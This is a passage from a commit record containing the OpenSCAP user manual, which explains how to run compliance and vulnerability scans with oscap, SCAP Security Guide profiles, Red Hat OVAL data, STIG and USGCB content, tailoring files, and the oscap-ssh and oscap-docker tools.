`multi-check` as\nshown in the example Rule snippet above.\n\nTo create a source DataStream from the patched content, the following command can be used:\n\n----\n$ oscap ds sds-compose xccdf-1.2.xml source_ds.xml\n----\n\nIf the original XCCDF file referenced a custom CPE dictionary, you also have to inject\nthe CPE dictionary into the DataStream in order to create a valid source DataStream.\nTo add a CPE dictionary component into your DataStream in place, use this command:\n\n----\n$ oscap ds sds-add cpe_dictionary.xml source_ds.xml\n----\n\nNow the `source_ds.xml` DataStream can be evaluated as usual.\n\n== Practical Examples\nThis section demonstrates practical usage of certain security content provided\nfor Red Hat products.\n\nThese practical examples show usage of industry standard checklists that\nwere validated by NIST.\n\n=== Auditing System Settings with SCAP Security Guide\nThe SSG project contains guidance for settings of Red Hat Enterprise Linux 7.\n\n1) Install the SSG\n\n----\n$ sudo yum install -y scap-security-guide\n----\n\n2) To inspect the security content use the `oscap info` module:\n\n----\n$ oscap info \/usr\/share\/xml\/scap\/ssg\/rhel7\/ssg-rhel7-ds.xml\n----\n\nThe output of this command contains available configuration profiles. To audit\nyour system settings choose the\n `xccdf_org.ssgproject.content_profile_rht-ccp` profile and run the\nevaluation command . For example, the The following command is used to assess\nthe given system against a draft SCAP profile for Red Hat Certified Cloud\nProviders:\n\n----\n$ oscap xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_rht-ccp \\\n--results ssg-rhel7-xccdf-result.xml \\\n--report ssg-rhel7-report.html \\\n\/usr\/share\/xml\/scap\/ssg\/rhel7\/ssg-rhel7-ds.xml\n----\n\n\n=== Auditing Security Vulnerabilities of Red Hat Products\nThe Red Hat Security Response Team provides OVAL definitions for all\nvulnerabilities (identified by CVE name) that affect Red Hat Enterprise\nLinux 3, 4, 5, 6 and 7. This enable users to perform a vulnerability scan\nand diagnose whether system is vulnerable or not. The data is provided in\nthree ways -- OVAL file, OVAL + XCCDF and a Source DataStream.\n\n==== OVAL + XCCDF\n\n1) Download the content\n---------------------------------------------------------------------------------\n$ wget https:\/\/www.redhat.com\/security\/data\/metrics\/com.redhat.rhsa-all.xccdf.xml\n$ wget https:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-all.xml\n---------------------------------------------------------------------------------\n\n2) Run the scan\n--------------------------------------------------------------------------------------------\n$ oscap xccdf eval --results results.xml --report report.html com.redhat.rhsa-all.xccdf.xml\n--------------------------------------------------------------------------------------------\n\nThis is the sample output. It reports that Red Hat Security\nAdvisory (RHSA-2013:0911) was issued but update was not applied so a\nsystem is affected by multiple CVEs (CVE-2013-1935, CVE-2013-1943,\nCVE-2013-2017)\n\n------------------------------------------------------------------------------------\nTitle RHSA-2013:0911: kernel security, bug fix, and enhancement update (Important)\nRule oval-com.redhat.rhsa-def-20130911\nIdent CVE-2013-1935\nIdent CVE-2013-1943\nIdent CVE-2013-2017\nResult fail\n------------------------------------------------------------------------------------\n\nHuman readable report *report.html* is generated, as well as \"machine\"\nreadable report **results.xml**. Both files hold information about\nvulnerability status of scanned system. They map RHSA to CVEs and report\nwhat security advisories are not applied to the scanned system. CVE identifiers\nare linked with National Vulnerability Databases where additional information\nlike CVE description, CVSS score, CVSS vector, etc. are stored.\n\n==== OVAL only\n\n1) Download the content\n---------------------------------------------------------------------------------\n$ wget https:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-all.xml\n---------------------------------------------------------------------------------\n\n2) Run the scan\n--------------------------------------------------------------------------------------------\n$ oscap oval eval --results results.xml --report report.html com.redhat.rhsa-all.xml\n--------------------------------------------------------------------------------------------\n\nThis is the sample output. It reports that Red Hat Security\nAdvisory (RHSA-2013:0911) was issued but update was not applied.\nNotice that the standard output is different from the XCCDF + OVAL output.\n\n------------------------------------------------------------------------------------\nDefinition oval:com.redhat.rhsa:def:20130911: true\n------------------------------------------------------------------------------------\n\nAs in case of XCCDF+OVAL, human readable report *report.html*, and \"machine\"\nreadable report **results.xml** are generated. Look of *report.html* is different\nto the one generated when XCCDF checklist is used as a basis for the scan, the\ninformation in it again holds information about vulnerability status of scanned\nsystem, and mapping of RHSA to CVEs. CVE identifiers are linked with Red Hat\ndatabase where additional information like CVE description, CVSS score, CVSS\nvector etc. are stored.\n\n\n==== Source DataStream\nThe Source DataStream use-case is very similar to OVAL+XCCDF. The only\ndifference is that you don't have to download two separate files.\n\n1) Download the content\n\n---------------------------------------------------------------------------------\n$ wget https:\/\/www.redhat.com\/security\/data\/metrics\/ds\/com.redhat.rhsa-all.ds.xml\n---------------------------------------------------------------------------------\n\n2) Run the scan\n\n--------------------------------------------------------------------------------------------\n$ oscap xccdf eval --results results.xml --report report.html com.redhat.rhsa-all.ds.xml\n--------------------------------------------------------------------------------------------\n\n\n==== More Specialized Files\n\nThe files we used above cover multiple Red Hat products. If you only want to\nscan one product - for example a specific version of Red Hat Enterprise Linux -\nwe advise to download a smaller specialized file covering just this one version.\nUsing a smaller file will utilitize less bandwidth and make the evaluation\nquicker.\n\nFor example for Red Hat Enterprise Linux 7 the plain OVAL file is located at:\n\n----\n$ wget https:\/\/www.redhat.com\/security\/data\/oval\/Red_Hat_Enterprise_Linux_7.xml\n----\n\nYou can get a list of all the plain OVAL files by visiting\nhttps:\/\/www.redhat.com\/security\/data\/oval\/\n\nThe list of available datastream files is available at\nhttps:\/\/www.redhat.com\/security\/data\/metrics\/ds\/\n\n\n==== Disclaimer\nNOTE: Note that these OVAL definitions are designed to only cover software and\nupdates released by Red Hat. You need to provide additional definitions in order\nto detect the patch status of third-party software.\n\nTo find out more information about this project, see\nhttps:\/\/www.redhat.com\/security\/data\/metrics\/.\n\n\n=== How to Evaluate PCI-DSS on RHEL7\nThis section describes how to evaluate the Payment Card Industry Data Security\nStandard (PCI-DSS) on Red Hat Enterprise Linux 7.\n\n1) Install SSG which provides the PCI-DSS SCAP content\n\n----\n$ sudo yum install -y scap-security-guide\n----\n\n2) Verify that the PCI-DSS profile is present\n\n----\n$ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\n3) Evaluate the PCI-DSS content\n\n----\n$ oscap xccdf eval \\\n--results results.xml \\\n--profile xccdf_org.ssgproject.content_profile_pci-dss \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\n4) Generate report readable in a web browser.\n\n----\n$ oscap xccdf generate report --output report.html results.xml\n----\n\n=== How to Evaluate DISA STIG\nThis section describes how to evaluate the Defense Information Systems Agency\n(DISA) Security Technical Implementation Guide (STIG) on Red Hat Eneterprise\nLinux 6.\n\n1) Download the DISA STIG content.\n----\n$ wget http:\/\/iasecontent.disa.mil\/stigs\/zip\/July2015\/U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark.zip\n----\n\n2) Unpack the content.\n---------------------------------------------------\n$ unzip U_RedHat_6_V1R8_STIG.zip\n---------------------------------------------------\n\n3) Fix the content using a sed substitution.\n---------------------------------------------------------------------------------------------------\n$ sed -i 's\/<Group\\ \\(.*\\)\/<Group\\ selected=\"false\"\\ \\1\/g' U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n---------------------------------------------------------------------------------------------------\n\nNOTE: Why is the substitution needed? According to the {xccdf_1-2}[XCCDF\nspecification 1.2] the `selected` attribute for *Rule* or *Group* is *true* by default.\nIt means that if you create a new profile even with only one rule selected, all\nrules within the benchmark will be evaluated because they are set to true by default. The\nsubstitution will set all Groups as unselected by default which means all\ndescendants will also be unselected by default.\n\n4) Display a list of available profiles.\n----\n$ oscap info U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\n5) Evaluate your favorite profile, for example *MAC-1_Public*, and write\nXCCDF results into the results.xml file.\n----\n$ oscap xccdf eval \\\n--profile MAC-1_Public \\\n--results results.xml \\\n--cpe U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml \\\nU_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\n6) Generate a scan report that is readable in a web browser.\n-----\n$ oscap xccdf generate report --output report.html results.xml\n-----\n\nIf you are interested in DISA STIG content for RHEL5 or RHEL7 please visit\n{nvd}[National Vulnerability Database] and look for *Red Hat Enterprise Linux 6*\nor *Red Hat Enterprise Linux 7* as a target product.\n\n=== How to Evaluate United States Government Configuration Baseline (USGCB)\nNOTE: NIST offers no official USGCB for RHEL6 as of September 2014 but you can\nacquire the content from the {ssg_git}[SSG] project.\n\nThe USGCB content for represents Tier IV Checklist for Red Hat\nEnterprise Linux 5 (as defined by NIST Special Publication 800-70).\n\nWARNING: Proper evaluation of the USGCB document requires OpenSCAP version 0.9.1\nor later.\n\nAfter ensuring that version of OpenSCAP on your system is\nsufficient, perform the following tasks:\n\n1) Download the USGCB content.\n------------------------------------------------------------------------------\n$ wget http:\/\/usgcb.nist.gov\/usgcb\/content\/scap\/USGCB-rhel5desktop-1.2.5.0.zip\n------------------------------------------------------------------------------\n\n2) Unpack the USGCB content.\n--------------------------------------\n$ unzip USGCB-rhel5desktop-1.2.5.0.zip\n--------------------------------------\n\n3) Run evaluation of the USGCB content.\n----\n$ oscap xccdf eval \\\n--profile united_states_government_configuration_baseline \\\n--cpe usgcb-rhel5desktop-cpe-dictionary.xml \\\n--oval-results \\\n--fetch-remote-resources \\\n--results results.xml \\\nusgcb-rhel5desktop-xccdf.xml\n----\n\n4) Generate a scan report that is readable in a web browser.\n-----\n$ oscap xccdf generate report --output report.html results.xml\n-----\n\nAdditional reports can be generated from detailed OVAL result files.\nScanner outputs OVAL results files in the current directory, for each\nOVAL file on input there is one output. In case of USGCB, there is\none OVAL file distributed along the XCCDF, another one which is\ndownloaded from Red Hat Repository. The latter contains CVE information\nfor each evaluated definition.\n\n----\n$ oscap oval generate report --output oval-report-1.html usgcb-rhel5desktop-oval.xml.result.xml\n$ oscap oval generate report --output oval-report-2.html http%3A%2F%2Fwww.redhat.com%2Fsecurity%2Fdata%2Foval%2Fcom.redhat.rhsa-all.xml.result.xml\n----\n\nIf you're interested in runing evaluation of the USGCB on a remote machine using\na GUI please see:\nhttps:\/\/open-scap.org\/resources\/documentation\/evaluate-remote-machine-for-usgcb-compliance-with-scap-workbench\/[Evaluate\nRemote Machine for USGCB Compliance with SCAP Workbench] tutorial.\n\n\n=== How to Evaluate Third-Party Guidances\nThe SCAP content repository hosted at {nvd}[National Vulnerability Database]\n(NVD) can be searched for publicly available guidances for a given\nproduct. For example, as per 2013\/05\/11 there are\nhttp:\/\/web.nvd.nist.gov\/view\/ncp\/repository?tier=3&product=Red+Hat+Enterprise+Linux+5[two]\nTier III checklists for Red Hat Enterprise Linux 5. Analogously, the\nMITRE Corp. hosts http:\/\/oval.mitre.org\/rep-data\/[repository] of OVAL\ncontent for various platforms, sorted by versions and classes.\n\nLikewise the USGCB, any downloaded guidance can be evaluated by\nOpenSCAP.\n\n* Examplary evaluation of DoD Consensus Security Configuration Checklist\nfor Red Hat Enterprise Linux 5 (2.0)\n----\n$ wget http:\/\/nvd.nist.gov\/ncp\/DoD-RHEL5-desktop.zip\n$ unzip DoD-RHEL5-desktop.zip\n$ oscap xccdf eval \\\n--profile DOD_baseline_1.0.0.1 \\\n--cpe dcb-rhel5_cpe-dictionary.xml \\\n--results result.xml \\\n--oval-results \\\ndcb-rhel5_xccdf.xml\n----\n\n* Examplary evaluation of Red Hat 5 STIG Benchmark (Version 1, Release 12)\n----\n$ wget http:\/\/iasecontent.disa.mil\/stigs\/zip\/July2015\/U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip\n$ unzip U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip\n$ oscap xccdf eval \\\n--profile MAC-2_Public \\\n--cpe U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml \\\n--results result.xml \\\n--oval-results \\\nU_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\nFurthermore, any individual file from the archive can be inspected using\nthe `oscap info` command line option. The oscap program does not have\nthe concept of importing SCAP files, therefore it can process any SCAP\nfiles available on the filesystem. That is possible because the SCAP\nstandard files are native file formats of the OpenSCAP.\n\n\n\n=== How to evaluate guidances for Red Hat Enterprise Linux 6 or 7\nGuidances for Red Hat Enterprise Linux 6 and 7 can be acquired from\n{ssg_git}[SCAP Security Guide\nproject] (SSG). SSG holds currently the most evolved and elaborate SCAP\npolicy for Linux systems. The project provides practical security\nhardening advice for Red Hat products and also links it to compliance\nrequirements in order to ease deployment activities, such as\ncertification and accreditation.\n\nThe project started in 2011 as open collaboration of U.S. Government\nbodies to develop next generation of United States Government Baseline\n(USGCB) available for Red Hat Enterprise Linux 6. There are multiple\nparties contributing to the project from the public sector and private\nsector.\n\nThe SSG project contains baselines for both desktops and servers. See\nhttps:\/\/github.com\/OpenSCAP\/scap-security-guide\n\n\n\n=== How to check that patches are up-to-date on Red Hat Enterprise Linux 6 or 7\nThis section describes how to check that software patches are up-to-date using\nexternal OVAL content.\n\n1) Install the SSG\n\n----\n$ sudo yum install -y scap-security-guide\n----\n\n2a) Evaluate common profile for RHEL 6\n\n----\n$ oscap xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_common \\\n--fetch-remote-resources \\\n--results-arf results.xml \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel6-ds.xml\n----\n\n2b) Evaluate common profile for RHEL 7\n\n----\n$ oscap xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_common \\\n--fetch-remote-resources \\\n--results-arf results.xml \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\nThis command evaluates common profile for Red Hat Enterprise Linux 6 or 7. Part of\nthe profile is a rule to check that patches are up-to-date. To evaluate the rule\ncorrectly, oscap tool needs to download an up-to-date OVAL file from Red Hat servers. This can be\nallowed using *--fetch-remote-resources* option. Result of this scan will be saved\nin **results.xml** using ARF format.\n\n\n\n=== How to tailor Source data stream\nThis section describes tailoring of content using Tailoring file. This allows\nyou to change behavior of content without its direct modification.\n\n1) Obtain tailoring file\n\nTailoring file can be easily generated using {workbench_url}[SCAP Workbench].\n\n2) List profiles of tailoring file\n\n----\n$ oscap info\nDocument type: XCCDF Tailoring\nImported: 2016-08-31T11:08:16\nBenchmark Hint: \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel6-ds.xml\nProfiles:\n\txccdf_org.ssgproject.content_profile_C2S_customized\n----\n\n3) Evaluate\n\n----\n$ oscap xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_C2S_customized \\\n--tailoring-file ssg-rhel6-ds-tailoring.xml \\\n--results results.xml\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel6-ds.xml\n----\n\nThe command above evaluates tailored data stream by **ssg-rhel6-ds-tailoring.xml** tailoring file.\nXCCDF results can be found in **results.xml** file.\n\nInstead of external tailoring file, you can also use tailoring component integrated to data stream.\n\n----\n$ oscap info simple-ds.xml\n\nDocument type: Source Data Stream\nImported: 2016-02-02T14:06:14\n\nStream: scap_org.open-scap_datastream_from_xccdf_simple-xccdf.xml\nGenerated: (null)\nVersion: 1.2\nChecklists:\n\tRef-Id: scap_org.open-scap_cref_simple-xccdf.xml\n\t\tStatus: incomplete\n\t\tResolved: false\n\t\tProfiles:\n\t\t\txccdf_org.open-scap_profile_override\n\t\tReferenced check files:\n\t\t\tsimple-oval.xml\n\t\t\t\tsystem: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n\tRef-Id: scap_org.open-scap_cref_simple-tailoring.xml\n\t\tBenchmark Hint: (null)\n\t\tProfiles:\n\t\t\txccdf_org.open-scap_profile_default\n\t\t\txccdf_org.open-scap_profile_unselecting\n\t\t\txccdf_org.open-scap_profile_override\nChecks:\n\tRef-Id: scap_org.open-scap_cref_simple-oval.xml\nNo dictionaries.\n----\n\nTo choose tailoring component \"scap_org.open-scap_cref_simple-tailoring.xml\", the command below can be used.\n\n----\n$ oscap xccdf eval \\\n--tailoring-id scap_org.open-scap_cref_simple-tailoring.xml \\\n--profile xccdf_org.open-scap_profile_default \\\n--results results.xml simple-ds.xml\n----\n\nThe command above evaluates content using tailoring component *scap_org.open-scap_cref_simple-tailoring.xml* from source data stream.\nScan results are stored in *results.xml* file.\n\n\n=== Evaluation of content\nSpecified XCCDF or data stream content can contain zero or more profiles.\n\nScan can be evaluated without specific profile, otherwise profile can be selected using\n*--profile* option.\n\n----\n$ oscap xccdf eval --results results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel6-ds.xml\n----\n\nThe command above evaluates rules without specific profile. XCCDF results are stored in *results.xml* file.\n\n\n== Other utilities\n\nApart from the `oscap` command, OpenSCAP provides also other utilities for\nspecial purposes. Those utilities use `oscap` under the hood, but they\nenable users to perform advanced tasks in a single command.\nThis manual gives a quick overview of and shows basic usage of these tools.\nEach of the tools have its own manual page that gives more detailed information.\n\n=== Scanning remote machines using oscap-ssh\n\nThe `oscap-ssh` is a simple tool for scanning remote machines with OpenSCAP\nover network and collecting results.\n\nThe tool uses SSH connection to copy the SCAP content to a remote machine, then\nit runs an evaluation of the target system and downloads the results back.\nThe remote machine needs to have OpenSCAP installed.\n\nThe tool can evaluate source DataStreams and OVAL files.\nUsage of the tool mimics usage and options of `oscap` tool.\n\nIn the following example, we will scan a remote Fedora server located on IP address\n*192.168.1.13* that listens for SSH connections on port *22*.\nThe server will be scanned for compliance with the *Common Profile for General-Purpose\nFedora Systems* provided by SCAP Security Guide.\nHTML report is written out as *report.html* on the local machine.\n\n----\n$ oscap-ssh root@192.168.1.13 22 xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_common \\\n--report report.html \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-fedora-ds.xml\n----\n\n=== Scanning of Docker containers and images using oscap-docker\n\nThe `oscap-docker` is used to scan Docker containers and images. It can\nassess vulnerabilities in the container or image and check their compliance\nwith security policies. Usage of the tool mimics usage and options\nof `oscap` tool.\n\nThe `oscap-docker` tool uses a technique called offline scanning.\nThat means that the filesystem of the container is mounted to a directory\non the host. The mounted filesystem is read-only. OpenSCAP then assess\nthe container from the host. Therefore no agent is installed\nin the container and container is not touched or changed in any way.\n\nHowever, `oscap-docker` requires http:\/\/www.projectatomic.io\/[Atomic]\ninstalled on the host. Atomic is advanced container management solution and\nit enables `oscap-docker` to access the containers.\n\nIn the first example, we will perform a vulnerability assessment\nof an Docker image of Red Hat Enterprise Linux 7 (named *rhel7*). The command\nwill attach docker image, determine OS variant\/version, download CVE stream\napplicable to the given image and finally it will evaluate the image\nfor vulnerabilities. CVE stream is a list of vulnerabilities in SCAP format\nand is downloaded directly from Red Hat.\nHTML report is written out as *report.html* on the local machine.\n\n----\n$ oscap-docker image-cve rhel7 --report report.html\n----\n\nIn the second example, we will check the same *rhel7* image for\ncompliance with a security policy specified in an XCCDF checklist.\n\n----\n$ oscap-docker image rhel7 xccdf eval --report report.html xccdf.xml\n----\n\nTo scan running containers, commands are very similar, just replace\n\"image-cve\" with \"container-cve\" and \"image\" with \"container\".\n\n=== Scanning of virtual machines using oscap-vm\n\nOpenSCAP provides a simple tool to evaluate virtual machines called `oscap-vm`.\n\nThe tool can scan given virtual machine directly from the virtualisation host.\nUsage of the tool mimics usage and options of `oscap` tool.\n\nSimilarly to `oscap-docker`, this utility also uses offline scanning,\nso it doesn't install anything in the guest, doesn't require OpenSCAP\ninstalled in the guest and it doesn't create or change anything in the\nguest's filesystem.\n\n=== Scanning arbitrary filesystems using oscap-chroot\n\nA very simple script `oscap-chroot` can be used to perform\nan offline scan of a filesystem that is mounted at arbitrary path.\nIt can be used for scanning of custom objects that are not supported\nby `oscap-docker` or `oscap-vm`, like containers in other\nformats than Docker.\nAgain, usage of the tool mimics usage and options of `oscap` tool.\n\n\n\n== Frequently Asked Questions (FAQs)\n*Why do I get \"notchecked\" results when I use e.g. https:\/\/dl.dod.cyber.mil\/wp-content\/uploads\/stigs\/zip\/U_Red_Hat_Enterprise_Linux_7_V2R3_STIG.zip[STIG checklist]?*\n\nThe downloaded guidance contains rule descriptions, but it doesn't contain OVAL checks which could be used for evaluation by OpenSCAP. You can find guidances with implemented OVAL checks and also with remediations at https:\/\/github.com\/ComplianceAsCode\/content[ComplianceAsCode] project, which contains wide range of profiles.\n\n*I try to apply a tailoring file, but OpenSCAP still evaluates rules that I have unselected. How can I enforce my changes of the profile?*\n\nMake sure that you provide the ID of the customized profile in `--profile` option instead of the ID of the original profile.\nIf you created the tailoring file using SCAP Workbench, you were prompted to choose the ID of the customized profile. You can display the ID of the customized profile by running `oscap info <your_tailoring_file>`. By default, the ID of the customized profile ends with `_customized` suffix.\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"7b4f58a379fe30f0d0af6154ad8a1c544f750c25","subject":"update repository name","message":"update repository name\n","repos":"Hexadorsimal\/openscap,Hexadorsimal\/openscap,mpreisler\/openscap,mpreisler\/openscap,Hexadorsimal\/openscap,redhatrises\/openscap,OpenSCAP\/openscap,ybznek\/openscap,mpreisler\/openscap,ybznek\/openscap,redhatrises\/openscap,jan-cerny\/openscap,Hexadorsimal\/openscap,ybznek\/openscap,OpenSCAP\/openscap,redhatrises\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,ybznek\/openscap,mpreisler\/openscap,Hexadorsimal\/openscap,jan-cerny\/openscap,jan-cerny\/openscap,jan-cerny\/openscap,jan-cerny\/openscap,mpreisler\/openscap,OpenSCAP\/openscap,ybznek\/openscap,redhatrises\/openscap,redhatrises\/openscap,Hexadorsimal\/openscap,OpenSCAP\/openscap,mpreisler\/openscap,jan-cerny\/openscap,redhatrises\/openscap,ybznek\/openscap","old_file":"docs\/manual\/manual.adoc","new_file":"docs\/manual\/manual.adoc","new_contents":"= OpenSCAP User Manual\nMichal \u0160ruba\u0159 <msrubar@redhat.com>\nv1.0, 2015-31-08\n:imagesdir: .\/images\n:workbench_url: https:\/\/www.open-scap.org\/tools\/scap-workbench\/\n:sce_web: https:\/\/www.open-scap.org\/features\/other-standards\/sce\/\n:openscap_web: https:\/\/open-scap.org\/\n:oscap_git: https:\/\/github.com\/OpenSCAP\/openscap\n:ssg_git: https:\/\/github.com\/OpenSCAP\/scap-security-guide\n:xmlsec: https:\/\/www.aleksey.com\/xmlsec\/\n:xslt: http:\/\/www.w3.org\/TR\/xslt\n:xsl: http:\/\/www.w3.org\/Style\/XSL\/\n:ssg: http:\/\/open-scap.org\/security-policies\/scap-security-guide\/\n:xccdf: http:\/\/scap.nist.gov\/specifications\/xccdf\/\n:xccdf_1-2: http:\/\/scap.nist.gov\/specifications\/xccdf\/#resource-1.2\n:scap: http:\/\/scap.nist.gov\/\n:nist: http:\/\/www.nist.gov\/\n:cpe: https:\/\/cpe.mitre.org\/\n:cce: https:\/\/cce.mitre.org\/\n:oval: https:\/\/oval.mitre.org\/\n:pci_dss: https:\/\/www.pcisecuritystandards.org\/security_standards\/\n:usgcb: http:\/\/usgcb.nist.gov\/\n:stig: http:\/\/iase.disa.mil\/stigs\/Pages\/index.aspx\n:scap_1-2: http:\/\/scap.nist.gov\/revision\/1.2\/\n:scap_1-1: http:\/\/scap.nist.gov\/revision\/1.1\/index.html\n:scap_1-0: http:\/\/scap.nist.gov\/revision\/1.0\/\n:nvd: https:\/\/web.nvd.nist.gov\/view\/ncp\/repository\n:toc:\n:toc-placement: preamble\n:numbered:\n\nimage::vertical-logo.png[align=\"center\"]\n\ntoc::[]\n\n== Introduction\n\nThis documentation provides information about a command-line tool called\n ```oscap``` and its most common operations. With ```oscap``` you can check\nsecurity configuration settings of a system, and examine the system for signs of\na compromise by using rules based on standards and specifications. The\n ```oscap``` uses {scap}[SCAP] which is a line of specifications maintained by\nthe {nist}[NIST] which was created to provide a standardized approach for\nmaintaining system security. New specifications are governed by NIST's SCAP\nhttp:\/\/scap.nist.gov\/timeline.html[Release cycle] in order to provide a\nconsistent and repeatable revision workflow. The ```oscap``` mainly processes\nthe {xccdf}[XCCDF] which is a standard way of expressing a checklist content and\ndefines security checklists. It also combines with other specifications such as\n{cpe}[CPE], {cce}[CCE] and {oval}[OVAL] to create a SCAP-expressed checklist that\ncan be processed by SCAP-validated products. For more information about the\nSCAP please refer to http:\/\/open-scap.org\/features\/standards\/[SCAP Standards].\n\nThe ```oscap``` tool is a part of the {openscap_web}[OpenSCAP] project. If you're\ninterested in a graphical alternative to this tool please visit\n{workbench_url}[SCAP Workbench] page.\n\n\nWe will use the _scap-security-guide_ {ssg}[SSG] project to provide us the SCAP\ncontent. It provides security policies written in a form of SCAP documents\ncovering many areas of computer security, and it implements security guidances\nrecommended by respected authorities, namely {pci_dss}[PCI DSS], {stig}[STIG], and\n{usgcb}[USGCB].\n\nYou can also generate your own SCAP content if you have an understanding of at least\nXCCDF or OVAL. XCCDF content is also frequently published online under open\nsource licenses, and you can customize this content to suit your needs instead.\nSCAP Workbench is a great tool to do the customization.\n\nThe Basic oscap usage section of the manual presents how to install the tool\nand SCAP content and how to use those to examine a SCAP content, perform a\nconfiguration scan or how to automatically remediate your machines.\n\nThird section provides cover advanced topic like validation, signing and\ntransformation of SCAP content, generating reports and guides and also some\ninformation about CPE applicability.\n\nLast section contains information about debuging and compiling oscap on Linux\nand Windows which can be useful for developers.\n\n== Basic oscap Usage\n\nIf you want to perform configuration or vulnerability scans of a local system\nthen the following must be available:\n\n . A tool (```oscap``` or SCAP Workbench)\n . SCAP content (XCCDF, OVAL...)\n\n=== Installation\n\nYou can either build the OpenSCAP library and the ```oscap``` tool from\n{oscap_git}[source] (for details please refer to the <<devs-compiling,compiling>> section),\nor you can use an existing build for your Linux distribution. Use the\nfollowing yum command if you want to install the oscap tool on your\nFedora or Red Hat Enterprise Linux distribution:\n\n----------------------------\n# yum install openscap-scanner\n----------------------------\n\nNOTE: If the ```openscap-scanner``` is not available install\n ```openscap-utils``` instead.\n\nBefore you can start using the ```oscap``` tool you must have some SCAP content\non your system. You can download it from the respective web site but we\nwill use the SSG project in the following sections. You can build it from the\n{ssg_git}[source] or you can install it using a package management system:\n\n----------------------------\n# yum install scap-security-guide\n----------------------------\n\nThe SCAP content will be installed in *__\/usr\/share\/xml\/scap\/ssg\/content\/__*.\n\nWhen the SCAP content is imported or installed on your system, ```oscap``` can\nprocess the content by specifying the file path to the content. The ```oscap```\nsupports SCAP {scap_1-2}[1.2] and is backward compatible with SCAP\n{scap_1-1}[1.1] and SCAP {scap_1-0}[1.0]. No special treatment is required in\norder to import and process earlier versions of the SCAP content.\n\nTo display the version of oscap, supported specifications, built-in CPE\nnames, and supported OVAL objects, type the following command:\n\n----------\n$ oscap -V\n----------\n\n=== Displaying Information SCAP Content\nOne of the capabilities of ```oscap``` is to display information about the SCAP\ncontents within a file. Running the ```oscap info``` command allows the\nexamination of the internal structure of a SCAP document and displays\ninformation such as the document type, specification version, status, the date\nthe document was published (Generated) and the date the document was copied to\nfile system (Imported). When examining an XCCDF document or a SCAP data stream,\ngenerally, the most useful information is about profiles, checklists, and\nstreams. The following example demonstrates usage of the command:\n\n $ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\nThe following is a sample output of the command above:\n\n----\nDocument type: Source Data Stream\nImported: 2015-07-13T10:23:11\n\nStream: scap_org.open-scap_datastream_from_xccdf_ssg-rhel7-xccdf-1.2.xml\nGenerated: (null)\nVersion: 1.2\nChecklists:\n\tRef-Id: scap_org.open-scap_cref_ssg-rhel7-xccdf-1.2.xml\n\t\tProfiles:\n\t\t\txccdf_org.ssgproject.content_profile_standard\n\t\t\txccdf_org.ssgproject.content_profile_pci-dss\n\t\t\txccdf_org.ssgproject.content_profile_rht-ccp\n\t\t\txccdf_org.ssgproject.content_profile_common\n\t\t\txccdf_org.ssgproject.content_profile_stig-rhel7-server-upstream\n\t\tReferenced check files:\n\t\t\tssg-rhel7-oval.xml\n\t\t\t\tsystem: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\nChecks:\n\tRef-Id: scap_org.open-scap_cref_ssg-rhel7-oval.xml\n\tRef-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-oval.xml\n\tRef-Id: scap_org.open-scap_cref_output--ssg-rhel7-oval.xml\nDictionaries:\n\tRef-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-dictionary.xml\n----\n\n=== Scanning with OSCAP\nThe main goal of the ```oscap``` tool is to perform configuration and\nvulnerability scans of a local system. Oscap is able to evaluate both\nXCCDF benchmarks and OVAL definitions and generate the appropriate\nresults. Please note that SCAP content can be provided either in a\nsingle file (as an OVAL file or SCAP Data Stream), or as multiple\nseparate XML files. The following examples distinguish between these two\napproaches.\n\n==== OVAL\nThe SCAP document can have a form of a single OVAL file (an OVAL\nDefinition file). The ```oscap``` tool processes the OVAL Definition file\nduring evaluation of OVAL definitions. It collects system\ninformation, evaluates it and generates an OVAL Result file. The result\nof evaluation of each OVAL definition is printed to standard output\nstream. The following examples describe the most common scenarios\ninvolving an OVAL Definition file.\n\n* To evaluate all definitions within the given OVAL Definition file, run\nthe following command:\n----------------------------------------------------------\n$ oscap oval eval --results oval-results.xml scap-oval.xml\n----------------------------------------------------------\nWhere *scap-oval.xml* is the OVAL Definition file and *oval-results.xml*\nis the OVAL Result file.\n\n* The following is an example of evaluating one particular definition\nwithin the given OVAL Definition file:\n----------------------------------------------------------------------------------\n$ oscap oval eval --id oval:rhel:def:1000 --results oval-results.xml scap-oval.xml\n----------------------------------------------------------------------------------\nWhere the OVAL definition being evaluated is defined by the\n*oval:rhel:def:1000* string, *scap-oval.xml* is the OVAL Definition file\nand *oval-results.xml* is the OVAL Result file.\n\n* To evaluate all definitions from the OVAL component that are part of a\nparticular data stream within a SCAP data stream 